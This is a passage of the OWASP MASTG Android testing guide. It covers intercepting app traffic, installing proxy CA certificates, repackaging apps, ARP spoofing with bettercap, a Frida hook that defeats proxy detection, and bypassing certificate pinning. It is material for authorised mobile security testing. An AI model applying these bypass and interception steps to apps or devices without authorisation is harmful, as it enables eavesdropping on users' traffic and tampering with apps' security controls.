"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#http","title":"HTTP","text":"FCM uses the ports 5228, 5229, and 5230 for HTTP communication. Usually, only port 5228 is used.
$ echo \"\nrdr pass inet proto tcp from any to any port 5228 -> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5229 -> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5230 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
For XMPP communication, FCM uses ports 5235 (Production) and 5236 (Testing).
$ echo \"\nrdr pass inet proto tcp from any to any port 5235 -> 127.0.0.1 port 8080\nrdr pass inet proto tcp from any to any port 5236 -> 127.0.0.1 port 8080\n\" | sudo pfctl -ef -\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#intercepting-the-requests","title":"Intercepting the Requests","text":"The interception proxy must listen to the port specified in the port forwarding rule above (port 8080).
Start the app and trigger a function that uses FCM. You should see HTTP messages in your interception proxy.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0010/#end-to-end-encryption-for-push-notifications","title":"End-to-End Encryption for Push Notifications","text":"As an additional layer of security, push notifications can be encrypted by using Capillary. Capillary is a library to simplify the sending of end-to-end (E2E) encrypted push messages from Java-based application servers to Android clients.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/","title":"Setting Up an Interception Proxy","text":"Several tools support the network analysis of applications that rely on the HTTP(S) protocol. The most important tools are the so-called interception proxies; OWASP ZAP and Burp Suite Professional are the most famous. An interception proxy gives the tester a man-in-the-middle position. This position is useful for reading and/or modifying all app requests and endpoint responses, which are used for testing Authorization, Session, Management, etc.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#interception-proxy-for-a-virtual-device","title":"Interception Proxy for a Virtual Device","text":""},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#setting-up-a-web-proxy-on-an-android-virtual-device-avd","title":"Setting Up a Web Proxy on an Android Virtual Device (AVD)","text":"The following procedure, which works on the Android emulator that ships with Android Studio 3.x, is for setting up an HTTP proxy on the emulator:
Configure the HTTP proxy in the emulator settings:
HTTP and HTTPS requests should now be routed over the proxy on the host computer. If not, try toggling airplane mode off and on.
A proxy for an AVD can also be configured on the command line by using the emulator command when starting an AVD. The following example starts the AVD Nexus_5X_API_23 and sets a proxy to 127.0.0.1 and port 8080.
emulator @Nexus_5X_API_23 -http-proxy 127.0.0.1:8080\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#installing-a-ca-certificate-on-the-virtual-device","title":"Installing a CA Certificate on the Virtual Device","text":"An easy way to install a CA certificate is to push the certificate to the device and add it to the certificate store via Security Settings. For example, you can install the PortSwigger (Burp) CA certificate as follows:
cacert.der
by clicking the \"CA Certificate\" button..der
to .cer
.Push the file to the emulator:
adb push cacert.cer /sdcard/\n
Navigate to Settings -> Security -> Install from SD Card.
cacert.cer
.You should then be prompted to confirm installation of the certificate (you'll also be asked to set a device PIN if you haven't already).
This installs the certificate in the user certificate store (tested on Genymotion VM). In order to place the certificate in the root store you can perform the following steps:
adb root
and adb shell
./data/misc/user/0/cacerts-added/
./system/etc/security/cacerts/
.For Android 7.0 (API level 24) and above follow the same procedure described in the \"Bypassing the Network Security Configuration\" section.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#interception-proxy-for-a-physical-device","title":"Interception Proxy for a Physical Device","text":"The available network setup options must be evaluated first. The mobile device used for testing and the host computer running the interception proxy must be connected to the same Wi-Fi network. Use either an (existing) access point or create an ad-hoc wireless network.
Once you've configured the network and established a connection between the testing host computer and the mobile device, several steps remain.
NET::ERR_CERT_VALIDITY_TOO_LONG
errors, if the leaf certificate happens to have a validity extending a certain time (39 months in the case of Chrome). This happens if the default Burp CA certificate is used, since the Burp Suite issues leaf certificates with the same validity as its CA certificate. You can circumvent this by creating your own CA certificate and importing it into the Burp Suite, as explained in this blog post. After completing these steps and starting the app, the requests should show up in the interception proxy.
A video of setting up OWASP ZAP with an Android device can be found on secure.force.com.
A few other differences: from Android 8.0 (API level 26) onward, the network behavior of the app changes when HTTPS traffic is tunneled through another connection. And from Android 9 (API level 28) onward, the SSLSocket and SSLEngine will behave a little bit different in terms of error handling when something goes wrong during the handshakes.
As mentioned before, starting with Android 7.0 (API level 24), the Android OS will no longer trust user CA certificates by default, unless specified in the application. In the following section, we explain two methods to bypass this Android security control.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#bypassing-the-network-security-configuration","title":"Bypassing the Network Security Configuration","text":"In this section we will present several methods to bypass Android's Network Security Configuration.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#adding-custom-user-certificates-to-the-network-security-configuration","title":"Adding Custom User Certificates to the Network Security Configuration","text":"There are different configurations available for the Network Security Configuration to add non-system Certificate Authorities via the src attribute:
<certificates src=[\"system\" | \"user\" | \"raw resource\"]\n overridePins=[\"true\" | \"false\"] />\n
Each certificate can be one of the following:
\"raw resource\"
is an ID pointing to a file containing X.509 certificates\"system\"
for the pre-installed system CA certificates\"user\"
for user-added CA certificatesThe CA certificates trusted by the app can be a system trusted CA as well as a user CA. Usually you will have added the certificate of your interception proxy already as additional CA in Android. Therefore we will focus on the \"user\" setting, which allows you to force the Android app to trust this certificate with the following Network Security Configuration below:
<network-security-config>\n <base-config>\n <trust-anchors>\n <certificates src=\"system\" />\n <certificates src=\"user\" />\n </trust-anchors>\n </base-config>\n</network-security-config>\n
To implement this new setting you must follow the steps below:
Decompile the app using a decompilation tool like apktool:
apktool d <filename>.apk\n
Make the application trust user certificates by creating a Network Security Configuration that includes <certificates src=\"user\" />
as explained above
Go into the directory created by apktool when decompiling the app and rebuild the app using apktool. The new apk will be in the dist
directory.
apktool b\n
You need to repackage the app, as explained in the \"Repackaging\" section of the \"Reverse Engineering and Tampering\" chapter. For more details on the repackaging process you can also consult the Android developer documentation, that explains the process as a whole.
Note that even if this method is quite simple, its major drawback is that you have to apply this operation to each application you want to evaluate, which is additional overhead for testing.
Bear in mind that if the app you are testing has additional hardening measures, like verification of the app signature, you might not be able to start the app anymore. As part of the repackaging you will sign the app with your own key, and therefore the changed signature will trigger such checks, which might lead to immediate termination of the app. You would need to identify and disable such checks either by patching them during repackaging of the app or by dynamic instrumentation through Frida.
There is a python script available that automates the steps described above called Android-CertKiller. This Python script can extract the APK from an installed Android app, decompile it, make it debuggable, add a new Network Security Configuration that allows user certificates, build and sign the new APK, and install the new APK with the SSL Bypass.
python main.py -w\n\n***************************************\nAndroid CertKiller (v0.1)\n***************************************\n\nCertKiller Wizard Mode\n---------------------------------\nList of devices attached\n4200dc72f27bc44d device\n\n---------------------------------\n\nEnter Application Package Name: nsc.android.mstg.owasp.org.android_nsc\n\nPackage: /data/app/nsc.android.mstg.owasp.org.android_nsc-1/base.apk\n\nI. Initiating APK extraction from device\n complete\n------------------------------\nI. Decompiling\n complete\n------------------------------\nI. Applying SSL bypass\n complete\n------------------------------\nI. Building New APK\n complete\n------------------------------\nI. Signing APK\n complete\n------------------------------\n\nWould you like to install the APK on your device(y/N): y\n------------------------------------\n Installing Unpinned APK\n------------------------------\nFinished\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#adding-the-proxys-certificate-among-system-trusted-cas-using-magisk","title":"Adding the Proxy's certificate among system trusted CAs using Magisk","text":"In order to avoid the obligation of configuring the Network Security Configuration for each application, we must force the device to accept the proxy's certificate as one of the system's trusted certificates.
There is a Magisk module that will automatically add all user-installed CA certificates to the list of system trusted CAs.
Download the latest version of the module at the Github Release page, push the downloaded file over to the device and import it in the Magisk Manager's \"Module\" view by clicking on the +
button. Finally, a restart is required by Magisk Manager to let changes take effect.
From now on, any CA certificate that is installed by the user via \"Settings\", \"Security & location\", \"Encryption & credentials\", \"Install from storage\" (location may differ) is automatically pushed into the system's trust store by this Magisk module. Reboot and verify that the CA certificate is listed in \"Settings\", \"Security & location\", \"Encryption & credentials\", \"Trusted credentials\" (location may differ).
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#manually-adding-the-proxys-certificate-among-system-trusted-cas","title":"Manually adding the Proxy's certificate among system trusted CAs","text":"Alternatively, you can follow the following steps manually in order to achieve the same result:
mount -o rw,remount /system
. If this command fails, try running the following command mount -o rw,remount -t ext4 /system
Prepare the proxy's CA certificates to match system certificates format. Export the proxy's certificates in der
format (this is the default format in Burp Suite) then run the following commands:
$ openssl x509 -inform DER -in cacert.der -out cacert.pem\n$ openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1\nmv cacert.pem <hash>.0\n
Finally, copy the <hash>.0
file into the directory /system/etc/security/cacerts and then run the following command:
chmod 644 <hash>.0\n
By following the steps described above you allow any application to trust the proxy's certificate, which allows you to intercept its traffic, unless of course the application uses SSL pinning.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#potential-obstacles","title":"Potential Obstacles","text":"Applications often implement security controls that make it more difficult to perform a security review of the application, such as root detection and certificate pinning. Ideally, you would acquire both a version of the application that has these controls enabled, and one where the controls are disabled. This allows you to analyze the proper implementation of the controls, after which you can continue with the less-secure version for further tests.
Of course, this is not always possible, and you may need to perform a black-box assessment on an application where all security controls are enabled. The section below shows you how you can circumvent certificate pinning for different applications.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#client-isolation-in-wireless-networks","title":"Client Isolation in Wireless Networks","text":"Once you have set up an interception proxy and have a MITM position, you might still not be able to see anything. This might be due to restrictions in the app (see next section) but can also be due to so-called client isolation in the Wi-Fi network that you are connected to.
Wireless Client Isolation is a security feature that prevents wireless clients from communicating with one another. This feature is useful for guest and BYOD SSIDs adding a level of security to limit attacks and threats between devices connected to the wireless networks.
What to do if the Wi-Fi we need for testing has client isolation?
You can configure the proxy on your Android device to point to 127.0.0.1:8080, connect your phone via USB to your host computer and use adb to make a reverse port forwarding:
adb reverse tcp:8080 tcp:8080\n
Once you have done this all proxy traffic on your Android phone will be going to port 8080 on 127.0.0.1 and it will be redirected via adb to 127.0.0.1:8080 on your host computer and you will see now the traffic in your Burp. With this trick you are able to test and intercept traffic also in Wi-Fis that have client isolation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#non-proxy-aware-apps","title":"Non-Proxy Aware Apps","text":"Once you have set up an interception proxy and have a MITM position, you might still not be able to see anything. This is mainly due to the following reasons:
In both scenarios you would need additional steps to finally be able to see the traffic. In the sections below we describe two different solutions, bettercap and iptables.
You could also use an access point that is under your control to redirect the traffic, but this would require additional hardware and we focus for now on software solutions.
For both solutions you need to activate \"Support invisible proxying\" in Burp, in Proxy Tab/Options/Edit Interface.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#iptables","title":"iptables","text":"You can use iptables on the Android device to redirect all traffic to your interception proxy. The following command would redirect port 80 to your proxy running on port 8080
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to-destination <Your-Proxy-IP>:8080\n
Verify the iptables settings and check the IP and port.
$ iptables -t nat -L\nChain PREROUTING (policy ACCEPT)\ntarget prot opt source destination\n\nChain INPUT (policy ACCEPT)\ntarget prot opt source destination\n\nChain OUTPUT (policy ACCEPT)\ntarget prot opt source destination\nDNAT tcp -- anywhere anywhere tcp dpt:5288 to:<Your-Proxy-IP>:8080\n\nChain POSTROUTING (policy ACCEPT)\ntarget prot opt source destination\n\nChain natctrl_nat_POSTROUTING (0 references)\ntarget prot opt source destination\n\nChain oem_nat_pre (0 references)\ntarget prot opt source destination\n
In case you want to reset the iptables configuration you can flush the rules:
iptables -t nat -F\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#bettercap","title":"bettercap","text":"Read the chapter \"Testing Network Communication\" and the test case \"Simulating a Man-in-the-Middle Attack\" for further preparation and instructions for running bettercap.
The host computer where you run your proxy and the Android device must be connected to the same wireless network. Start bettercap with the following command, replacing the IP address below (X.X.X.X) with the IP address of your Android device.
$ sudo bettercap -eval \"set arp.spoof.targets X.X.X.X; arp.spoof on; set arp.spoof.internal true; set arp.spoof.fullduplex true;\"\nbettercap v2.22 (built for darwin amd64 with go1.12.1) [type 'help' for a list of commands]\n\n[19:21:39] [sys.log] [inf] arp.spoof enabling forwarding\n[19:21:39] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0011/#proxy-detection","title":"Proxy Detection","text":"Some mobile apps try to detect whether a proxy is set. If that's the case, they assume that this is malicious and will not work properly.
In order to bypass such a protection mechanism you could either setup bettercap or configure iptables that don't need a proxy setup on your Android phone. A third option we didn't mention before and that is applicable in this scenario is using Frida. It is possible on Android to detect if a system proxy is set by querying the ProxyInfo
class and check the getHost() and getPort() methods. There might be various other methods to achieve the same task and you would need to decompile the APK in order to identify the actual class and method name.
Below you can find boilerplate source code for a Frida script that will help you to overload the method (in this case called isProxySet) that verifies whether a proxy is set and will always return false. Even if a proxy is configured, the app will think that none is set because the function returns false.
setTimeout(function(){\n Java.perform(function (){\n console.log(\"[*] Script loaded\")\n\n var Proxy = Java.use(\"<package-name>.<class-name>\")\n\n Proxy.isProxySet.overload().implementation = function() {\n console.log(\"[*] isProxySet function invoked\")\n return false\n }\n });\n});\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/","title":"Bypassing Certificate Pinning","text":"Some applications will implement SSL Pinning, which prevents the application from accepting your intercepting certificate as a valid certificate. This means that you will not be able to monitor the traffic between the application and the server.
For most applications, certificate pinning can be bypassed within seconds, but only if the app uses the API functions that are covered by these tools. If the app is implementing SSL Pinning with a custom framework or library, the SSL Pinning must be manually patched and deactivated, which can be time-consuming.
This section describes various ways to bypass SSL Pinning and gives guidance about what you should do when the existing tools don't help.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypassing-methods","title":"Bypassing Methods","text":"There are several ways to bypass certificate pinning for a black box test, depending on the frameworks available on the device:
android sslpinning disable
command.If you have a rooted device with frida-server installed, you can bypass SSL pinning by running the following Objection command (repackage your app if you're using a non-rooted device):
android sslpinning disable\n
Here's an example of the output:
See also Objection's help on Disabling SSL Pinning for Android for further information and inspect the pinning.ts file to understand how the bypass works.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypass-custom-certificate-pinning-statically","title":"Bypass Custom Certificate Pinning Statically","text":"Somewhere in the application, both the endpoint and the certificate (or its hash) must be defined. After decompiling the application, you can search for:
grep -ri \"sha256\\|sha1\" ./smali
. Replace the identified hashes with the hash of your proxy's CA. Alternatively, if the hash is accompanied by a domain name, you can try modifying the domain name to a non-existing domain so that the original domain is not pinned. This works well on obfuscated OkHTTP implementations.find ./assets -type f \\( -iname \\*.cer -o -iname \\*.crt \\)
. Replace these files with your proxy's certificates, making sure they are in the correct format.find ./ -type f \\( -iname \\*.jks -o -iname \\*.bks \\)
. Add your proxy's certificates to the truststore and make sure they are in the correct format.Keep in mind that an app might contain files without extension. The most common file locations are assets
and res
directories, which should also be investigated.
As an example, let's say that you find an application which uses a BKS (BouncyCastle) truststore and it's stored in the file res/raw/truststore.bks
. To bypass SSL Pinning you need to add your proxy's certificate to the truststore with the command line tool keytool
. Keytool
comes with the Java SDK and the following values are needed to execute the command:
To add your proxy's certificate use the following command:
keytool -importcert -v -trustcacerts -file proxy.cer -alias aliascert -keystore \"res/raw/truststore.bks\" -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath \"providerpath/bcprov-jdk15on-164.jar\" -storetype BKS -storepass password\n
To list certificates in the BKS truststore use the following command:
keytool -list -keystore \"res/raw/truststore.bks\" -provider org.bouncycastle.jce.provider.BouncyCastleProvider -providerpath \"providerpath/bcprov-jdk15on-164.jar\" -storetype BKS -storepass password\n
After making these modifications, repackage the application using apktool and install it on your device.
If the application uses native libraries to implement network communication, further reverse engineering is needed. An example of such an approach can be found in the blog post Identifying the SSL Pinning logic in smali code, patching it, and reassembling the APK
"},{"location":"MASTG/techniques/android/MASTG-TECH-0012/#bypass-custom-certificate-pinning-dynamically","title":"Bypass Custom Certificate Pinning Dynamically","text":"Bypassing the pinning logic dynamically makes it more convenient as there is no need to bypass any integrity checks and it's much faster to perform trial & error attempts.
Finding the correct method to hook is typically the hardest part and can take quite some time depending on the level of obfuscation. As developers typically reuse existing libraries, it is a good approach to search for strings and license files that identify the used library. Once the library has been identified, examine the non-obfuscated source code to find methods which are suited for dynamic instrumentation.
As an example, let's say that you find an application which uses an obfuscated OkHTTP3 library. The documentation shows that the CertificatePinner.Builder
class is responsible for adding pins for specific domains. If you can modify the arguments to the Builder.add method, you can change the hashes to the correct hashes belonging to your certificate. Finding the correct method can be done in either two ways, as explained in this blog post by Jeroen Beckers:
For the Builder.add method, you can find the possible methods by running the following grep command: grep -ri java/lang/String;\\[Ljava/lang/String;)L ./
This command will search for all methods that take a string and a variable list of strings as arguments, and return a complex object. Depending on the size of the application, this may have one or multiple matches in the code.
Hook each method with Frida and print the arguments. One of them will print out a domain name and a certificate hash, after which you can modify the arguments to circumvent the implemented pinning.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0013/","title":"Reverse Engineering Android Apps","text":"Android's openness makes it a favorable environment for reverse engineers, offering big advantages that are not available with iOS. Because Android is open-source, you can study its source code at the Android Open Source Project (AOSP) and modify the OS and its standard tools any way you want. Even on standard retail devices, it is possible to do things like activating developer mode and sideloading apps without jumping through many hoops. From the powerful tools shipping with the SDK to the wide range of available reverse engineering tools, there's a lot of niceties to make your life easier.
However, there are also a few Android-specific challenges. For example, you'll need to deal with both Java bytecode and native code. Java Native Interface (JNI) is sometimes deliberately used to confuse reverse engineers (to be fair, there are legitimate reasons for using JNI, such as improving performance or supporting legacy code). Developers sometimes use the native layer to \"hide\" data and functionality, and they may structure their apps such that execution frequently jumps between the two layers.
You'll need at least a working knowledge of both the Java-based Android environment and the Linux OS and Kernel, on which Android is based. You'll also need the right toolset to deal with both the bytecode running on the Java virtual machine and the native code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0014/","title":"Static Analysis on Android","text":"Static analysis is a technique used to examine and evaluate the source code of a mobile application without executing it. This method is instrumental in identifying potential security vulnerabilities, coding errors, and compliance issues. Static analysis tools can scan the entire codebase automatically, making them a valuable asset for developers and security auditors.
Two good examples of static analysis tools are grep and semgrep. However, there are many other tools available, and you should choose the one that best fits your needs.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0014/#example-using-grep-for-manifest-analysis-in-android-apps","title":"Example: Using grep for Manifest Analysis in Android Apps","text":"One simple yet effective use of static analysis is using the grep
command-line tool to inspect the AndroidManifest.xml
file of an Android app. For example, you can extract the minimum SDK version (which indicates the lowest version of Android the app supports) with the following grep
command:
grep 'android:minSdkVersion' AndroidManifest.xml\n
This command searches for the android:minSdkVersion
attribute within the manifest file. Ensuring a higher minSdkVersion
can reduce security risks, as older versions of Android may not include the latest security features and fixes.
semgrep is a more advanced tool that can be used for pattern matching in code. It's particularly useful for identifying complex coding patterns that might lead to security vulnerabilities. For example, to find instances where a deterministic seed is used with the SecureRandom
class (which can compromise the randomness and thus the security), you can use a semgrep rule like:
rules:\n - id: insecure-securerandom-seed\n patterns:\n - pattern: new SecureRandom($SEED)\n - pattern-not: $SEED = null\n message: \"Using a deterministic seed with SecureRandom. Consider using a more secure seed.\"\n languages: [java]\n severity: WARNING\n
This rule will flag any instances in the code where SecureRandom
is initialized with a specific seed, excluding cases where the seed is null (which implies a secure random seed).
TBD
"},{"location":"MASTG/techniques/android/MASTG-TECH-0016/","title":"Disassembling Code to Smali","text":"If you want to inspect the app's smali code (instead of Java), you can open your APK in Android Studio by clicking Profile or debug APK from the \"Welcome screen\" (even if you don't intend to debug it you can take a look at the smali code).
Alternatively you can use apktool to extract and disassemble resources directly from the APK archive and disassemble Java bytecode to smali. apktool allows you to reassemble the package, which is useful for patching the app or applying changes to e.g. the Android Manifest.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0017/","title":"Decompiling Java Code","text":"In Android app security testing, if the application is based solely on Java and doesn't have any native code (C/C++ code), the reverse engineering process is relatively easy and recovers (decompiles) almost all the source code. In those cases, black-box testing (with access to the compiled binary, but not the original source code) can get pretty close to white-box testing.
Nevertheless, if the code has been purposefully obfuscated (or some tool-breaking anti-decompilation tricks have been applied), the reverse engineering process may be very time-consuming and unproductive. This also applies to applications that contain native code. They can still be reverse engineered, but the process is not automated and requires knowledge of low-level details.
If you want to look directly into Java source code on a GUI, simply open your APK using jadx or Bytecode Viewer.
Android decompilers go one step further and attempt to convert Android bytecode back into Java source code, making it more human-readable. Fortunately, Java decompilers generally handle Android bytecode well. The above mentioned tools embed, and sometimes even combine, popular free decompilers such as:
Alternatively you can use the APKLab extension for Visual Studio Code or run apkx on your APK or use the exported files from the previous tools to open the reversed source code on your preferred IDE.
In the following example we'll be using UnCrackable App for Android Level 1. First, let's install the app on a device or emulator and run it to see what the crackme is about.
Seems like we're expected to find some kind of secret code!
We're looking for a secret string stored somewhere inside the app, so the next step is to look inside. First, unzip the APK file (unzip UnCrackable-Level1.apk -d UnCrackable-Level1
) and look at the content. In the standard setup, all the Java bytecode and app data is in the file classes.dex
in the app root directory (UnCrackable-Level1/
). This file conforms to the Dalvik Executable Format (DEX), an Android-specific way of packaging Java programs. Most Java decompilers take plain class files or JARs as input, so you need to convert the classes.dex file into a JAR first. You can do this with dex2jar
or enjarify
.
Once you have a JAR file, you can use any free decompiler to produce Java code. In this example, we'll use the CFR decompiler. CFR releases are available on the author's website. CFR was released under an MIT license, so you can use it freely even though its source code is not available.
The easiest way to run CFR is through apkx, which also packages dex2jar
and automates extraction, conversion, and decompilation. Run it on the APK and you should find the decompiled sources in the directory Uncrackable-Level1/src
. To view the sources, a simple text editor (preferably with syntax highlighting) is fine, but loading the code into a Java IDE makes navigation easier. Let's import the code into IntelliJ, which also provides on-device debugging functionality.
Open IntelliJ and select \"Android\" as the project type in the left tab of the \"New Project\" dialog. Enter \"Uncrackable1\" as the application name and \"vantagepoint.sg\" as the company name. This results in the package name \"sg.vantagepoint.uncrackable1\", which matches the original package name. Using a matching package name is important if you want to attach the debugger to the running app later on because IntelliJ uses the package name to identify the correct process.
In the next dialog, pick any API number; you don't actually want to compile the project, so the number doesn't matter. Click \"next\" and choose \"Add no Activity\", then click \"finish\".
Once you have created the project, expand the \"1: Project\" view on the left and navigate to the folder app/src/main/java
. Right-click and delete the default package \"sg.vantagepoint.uncrackable1\" created by IntelliJ.
Now, open the Uncrackable-Level1/src
directory in a file browser and drag the sg
directory into the now empty Java
folder in the IntelliJ project view (hold the \"alt\" key to copy the folder instead of moving it).
You'll end up with a structure that resembles the original Android Studio project from which the app was built.
See the section \"Reviewing Decompiled Java Code\" below to learn how to proceed when inspecting the decompiled Java code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0018/","title":"Disassembling Native Code","text":"Dalvik and ART both support the Java Native Interface (JNI), which defines a way for Java code to interact with native code written in C/C++. As on other Linux-based operating systems, native code is packaged (compiled) into ELF dynamic libraries (*.so), which the Android app loads at runtime via the System.load
method. However, instead of relying on widely used C libraries (such as glibc), Android binaries are built against a custom libc named Bionic. Bionic adds support for important Android-specific services such as system properties and logging, and it is not fully POSIX-compatible.
When reversing an Android application containing native code, we need to understand a couple of data structures related to the JNI bridge between Java and native code. From the reversing perspective, we need to be aware of two key data structures: JavaVM
and JNIEnv
. Both of them are pointers to pointers to function tables:
JavaVM
provides an interface to invoke functions for creating and destroying a JavaVM. Android allows only one JavaVM
per process and is not really relevant for our reversing purposes.JNIEnv
provides access to most of the JNI functions which are accessible at a fixed offset through the JNIEnv
pointer. This JNIEnv
pointer is the first parameter passed to every JNI function. We will discuss this concept again with the help of an example later in this chapter.It is worth highlighting that analyzing disassembled native code is much more challenging than disassembled Java code. When reversing the native code in an Android application we will need a disassembler.
In the next example we'll reverse the HelloWorld-JNI.apk from the OWASP MASTG repository. Installing and running it in an emulator or Android device is optional.
wget https://github.com/OWASP/owasp-mastg/raw/master/Samples/Android/01_HelloWorld-JNI/HelloWord-JNI.apk\n
This app is not exactly spectacular, all it does is show a label with the text \"Hello from C++\". This is the app Android generates by default when you create a new project with C/C++ support, which is just enough to show the basic principles of JNI calls.
Decompile the APK with apkx
.
$ apkx HelloWord-JNI.apk\nExtracting HelloWord-JNI.apk to HelloWord-JNI\nConverting: classes.dex -> classes.jar (dex2jar)\ndex2jar HelloWord-JNI/classes.dex -> HelloWord-JNI/classes.jar\nDecompiling to HelloWord-JNI/src (cfr)\n
This extracts the source code into the HelloWord-JNI/src
directory. The main activity is found in the file HelloWord-JNI/src/sg/vantagepoint/helloworldjni/MainActivity.java
. The \"Hello World\" text view is populated in the onCreate
method:
public class MainActivity\nextends AppCompatActivity {\n static {\n System.loadLibrary(\"native-lib\");\n }\n\n @Override\n protected void onCreate(Bundle bundle) {\n super.onCreate(bundle);\n this.setContentView(2130968603);\n ((TextView)this.findViewById(2131427422)).setText((CharSequence)this. \\\n stringFromJNI());\n }\n\n public native String stringFromJNI();\n}\n
Note the declaration of public native String stringFromJNI
at the bottom. The keyword \"native\" tells the Java compiler that this method is implemented in a native language. The corresponding function is resolved during runtime, but only if a native library that exports a global symbol with the expected signature is loaded (signatures comprise a package name, class name, and method name). In this example, this requirement is satisfied by the following C or C++ function:
JNIEXPORT jstring JNICALL Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI(JNIEnv *env, jobject)\n
So where is the native implementation of this function? If you look into the \"lib\" directory of the unzipped APK archive, you'll see several subdirectories (one per supported processor architecture), each of them containing a version of the native library, in this case libnative-lib.so
. When System.loadLibrary
is called, the loader selects the correct version based on the device that the app is running on. Before moving ahead, pay attention to the first parameter passed to the current JNI function. It is the same JNIEnv
data structure which was discussed earlier in this section.
Following the naming convention mentioned above, you can expect the library to export a symbol called Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI
. On Linux systems, you can retrieve the list of symbols with readelf
(included in GNU binutils) or nm
. Do this on macOS with the greadelf
tool, which you can install via Macports or Homebrew. The following example uses greadelf
:
$ greadelf -W -s libnative-lib.so | grep Java\n 3: 00004e49 112 FUNC GLOBAL DEFAULT 11 Java_sg_vantagepoint_helloworld_MainActivity_stringFromJNI\n
You can also see this using radare2's rabin2:
$ rabin2 -s HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so | grep -i Java\n003 0x00000e78 0x00000e78 GLOBAL FUNC 16 Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
This is the native function that eventually gets executed when the stringFromJNI
native method is called.
To disassemble the code, you can load libnative-lib.so
into any disassembler that understands ELF binaries (i.e., any disassembler). If the app ships with binaries for different architectures, you can theoretically pick the architecture you're most familiar with, as long as it is compatible with the disassembler. Each version is compiled from the same source and implements the same functionality. However, if you're planning to debug the library on a live device later, it's usually wise to pick an ARM build.
To support both older and newer ARM processors, Android apps ship with multiple ARM builds compiled for different Application Binary Interface (ABI) versions. The ABI defines how the application's machine code is supposed to interact with the system at runtime. The following ABIs are supported:
Most disassemblers can handle any of those architectures. Below, we'll be viewing the armeabi-v7a version (located in HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so
) in radare2 and in IDA Pro. See the section \"Reviewing Disassembled Native Code\" below to learn how to proceed when inspecting the disassembled native code.
To open the file in radare2 you only have to run r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so
. The chapter \"Android Basic Security Testing\" already introduced radare2. Remember that you can use the flag -A
to run the aaa
command right after loading the binary in order to analyze all referenced code.
$ r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Check for objc references\n[x] Check for vtables\n[x] Finding xrefs in noncode section with anal.in=io.maps\n[x] Analyze value pointers (aav)\n[x] Value from 0x00000000 to 0x00001dcf (aav)\n[x] 0x00000000-0x00001dcf in 0x0-0x1dcf (aav)\n[x] Emulate code to find computed references (aae)\n[x] Type matching analysis for all functions (aaft)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n -- Print the contents of the current block with the 'p' command\n[0x00000e3c]>\n
Note that for bigger binaries, starting directly with the flag -A
might be very time consuming as well as unnecessary. Depending on your purpose, you may open the binary without this option and then apply a less complex analysis like aa
or a more concrete type of analysis such as the ones offered in aa
(basic analysis of all functions) or aac
(analyze function calls). Remember to always type ?
to get the help or attach it to commands to see even more command or options. For example, if you enter aa?
you'll get the full list of analysis commands.
[0x00001760]> aa?\nUsage: aa[0*?] # see also 'af' and 'afna'\n| aa alias for 'af@@ sym.*;af@entry0;afva'\n| aaa[?] autoname functions after aa (see afna)\n| aab abb across bin.sections.rx\n| aac [len] analyze function calls (af @@ `pi len~call[1]`)\n| aac* [len] flag function calls without performing a complete analysis\n| aad [len] analyze data references to code\n| aae [len] ([addr]) analyze references with ESIL (optionally to address)\n| aaf[e|t] analyze all functions (e anal.hasnext=1;afr @@c:isq) (aafe=aef@@f)\n| aaF [sym*] set anal.in=block for all the spaces between flags matching glob\n| aaFa [sym*] same as aaF but uses af/a2f instead of af+/afb+ (slower but more accurate)\n| aai[j] show info of all analysis parameters\n| aan autoname functions that either start with fcn.* or sym.func.*\n| aang find function and symbol names from golang binaries\n| aao analyze all objc references\n| aap find and analyze function preludes\n| aar[?] [len] analyze len bytes of instructions for references\n| aas [len] analyze symbols (af @@= `isq~[0]`)\n| aaS analyze all flags starting with sym. (af @@ sym.*)\n| aat [len] analyze all consecutive functions in section\n| aaT [len] analyze code after trap-sleds\n| aau [len] list mem areas (larger than len bytes) not covered by functions\n| aav [sat] find values referencing a specific section or map\n
There is a thing that is worth noticing about radare2 vs other disassemblers like e.g. IDA Pro. The following quote from this article of radare2's blog (https://radareorg.github.io/blog/) offers a good summary.
